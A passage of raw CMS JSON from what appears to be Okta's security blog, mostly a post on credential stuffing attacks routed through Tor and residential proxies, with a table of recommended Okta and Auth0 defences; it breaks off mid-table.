of available functionality, ready for you to customize and leverage in your Okta org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/product-hub/oie/upgrading-to-okta-identity-engine?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"helpful resources\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-upgrade-eligibility.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"get started\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on the platform upgrade from Okta Classic to Okta Identity Engine, joining over 12,000 customers in taking advantage of the updated security features today. For additional support, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/group/0F94z000000XoN1CAK/okta-identity-engine-office-hours?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"register now\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"1-on-1 OIE office hours\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For new or prospective customers interested in OIE, we invite you to check out Okta’s industry-leading Identity solutions by signing up for a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"free \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/free-trial/?_gl=1*hqmasd*_gcl_aw*R0NMLjE3MjgzMzM5NjAuQ2owS0NRandqWTY0QmhDYUFSSXNBSWZjN1liU0puXzFYeTZhTjBuOTl6TEQyWkZvWFFwNXlZbXZkMUJUV2VmTGxrZ180MENmZHZRUWpRY2FBc01JRUFMd193Y0I.*_gcl_au*NjQ3Mjc3MzY3LjE3MjQ0MjE5NDI.*_ga*NTE0NTAxODM2LjE3MjQwOTM3NjA.*_ga_QKMSDV5369*MTcyODY1NTk2Ny4xMDcuMS4xNzI4NjU2NzA0LjQwLjAuMA\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"30-day trial\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" now! For more on OIE, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine-upgrade/faq.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"frequently asked questions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta’s Identity Engine offers the most modern way to customize your Okta experience and implement flexible, customized Identity use cases."},"updatedAt":"2025-02-09T23:47:31.380Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/blockanonymizers","id":"0449ba3a-2a32-5643-b57d-f119c515c74a","title":"How to Block Anonymizing Services using Okta","date":"2024-04-27T03:59:59+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the last month, Okta has observed an increase in the frequency and scale of credential stuffing attacks targeting online services, facilitated by the broad availability of residential proxy services, lists of previously stolen credentials (“combo lists”), and scripting tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From March 18, 2024 through to April 16, 2024, Duo Security and Cisco Talos \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"observed large-scale brute force attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on multiple models of VPN devices.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From April 19, 2024 through to April 26, 2024, Okta’s Identity Threat Research team observed a spike in credential stuffing activity against user accounts from what appears to be similar infrastructure.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In credential stuffing attacks, adversaries attempt to sign-in to online services using large lists of usernames and passwords obtained from previous data breaches of unrelated entities, or from phishing or malware campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All recent attacks we have observed share one feature in common: they rely on requests being routed through anonymizing services such as TOR. Millions of the requests were also routed through a variety of residential proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is the Tor Network?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tor (The Onion Router) provides its users a method of sending requests to web sites in which the originating source IP address of the request is obscured. Tor relies on the relay of messages across an overlay network of “onion routers”, each of which can only observe the IP of the preceding node and the next node in the communication. While Tor has legitimate uses, it is routinely used to conceal the real IP address of attackers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are Residential Proxies?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Residential Proxies are networks of legitimate user devices that route traffic on behalf of a paid subscriber. Providers of residential proxies effectively rent access to route authentication requests through the computer, smartphone or router of a real user, and proxy traffic through the IP of these devices to anonymize the source of the traffic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Residential Proxy providers don’t tend to advertise how they build these networks of real user devices. Sometimes a user device is enrolled in a proxy network because the user consciously chooses to download “proxyware” into their device in exchange for payment or something else of value. At other times, a user device is infected with malware without the user’s knowledge and becomes enrolled in what we would typically describe as a botnet. More recently, we have observed a large number of mobile devices used in proxy networks where the user has downloaded a mobile app developed using compromised SDKs (software development kits). Effectively, the developers of these apps have consented to or have been tricked into using an SDK that enrolls the device of any user running the app in a residential proxy network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The net sum of this activity is that most of the traffic in these credential stuffing attacks appear to originate from the mobile devices and browsers of everyday users, rather than from the IP space of VPS providers. For more information on residential proxy services, we recommend this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.orangecyberdefense.com/be/blog/unveiling-the-depths-of-residential-proxies-providers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"informative summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by CERT Orange Cyberdefense and Sekoia.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Block it at the Edge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the key tenets of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is to champion customer security best practices. We are committed to raising the bar for default security features in our platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In February 2024, Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/allow-admins-to-detect-and-block-requests-from-anonymizers?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"released\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" a well-timed capability into the Okta Platform that detects and blocks requests from anonymizing services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations that wish to deny access from specific anonymizers, and allowlist others, must first be licensed to use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Dynamic Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", which is included in the Adaptive MFA SKU). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using Auth0 should consider the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attack Protection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" Suite, and consider the other recommendations in the table below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern Defenses, Built into the Identity Platform\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The unprecedented scale of these attacks has provided clear insights into the controls most effective against credential stuffing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/configure-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Okta’s built-in control against high volume attacks, blocks requests from IPs involved in large scale credential based attacks prior to authentication.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The small percentage of customers where these suspicious requests proceeded to authentication shared similar configurations: The Org was nearly always running on the Okta Classic Engine, ThreatInsight was configured in Audit-only mode (not Log and Enforce mode), and Authentication policies permitted requests from anonymizing proxies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers using Okta Identity Engine that (a) enabled ThreatInsight in log and enforce mode and (b) deny access requests from anonymizing proxies were protected from these opportunistic accounts. These basic features are available in all Okta SKUs. Upgrading to Okta Identity Engine is free, often highly automated, and provides access to a range of features including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/CAPTCHA/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAPTCHA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" challenges for risky sign-ins and passwordless authentication using Okta FastPass.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Broader Recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend Okta customers practice defense in depth to mitigate the risk of account takeovers from credential stuffing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommendation\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity and Customer Identity\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embrace Passwordless \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"and \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Support \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/passkeys\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"PassKeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"as a preferred sign-in method\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent users from making poor password choices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require 12 chars and no parts of username in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Password Policy\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\". Block passwords found in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/policies/configure-password-policies.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"common password list\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breached Password Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"or \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to prevent use of passwords known to have been breached in 3P sites\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA on sign-in\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA in Global Session Policies\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require MFA for Password Authentication flows\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"requests from locations where your organization does not operate\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" to block requests prior to authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny access by location using a WAF or via the Country-based Access Control \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny authentication requests from IPs with poor reputation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny requests made via anonymizing services via \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/network/about-dynamic-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Network Zones\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/configure-threatinsight.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"log and enforce \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"mode to deny attempts based on the volume and velocity of failed requests from an IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/CAPTCHA/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CAPTCHA\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" challenges on high risk logins\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/suspicious-ip-throttling\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious IP Throttling\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"to slow down login attempts from suspicious IPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/bot-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bot Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"to present CAPTCHA challenges to requests from suspicious IPs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use 3P \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/customize/actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 Actions \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations to check if an IP is associated with an anonymizing proxies \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Monitor for and respond to anomalous sign-in behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce per-user \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Account 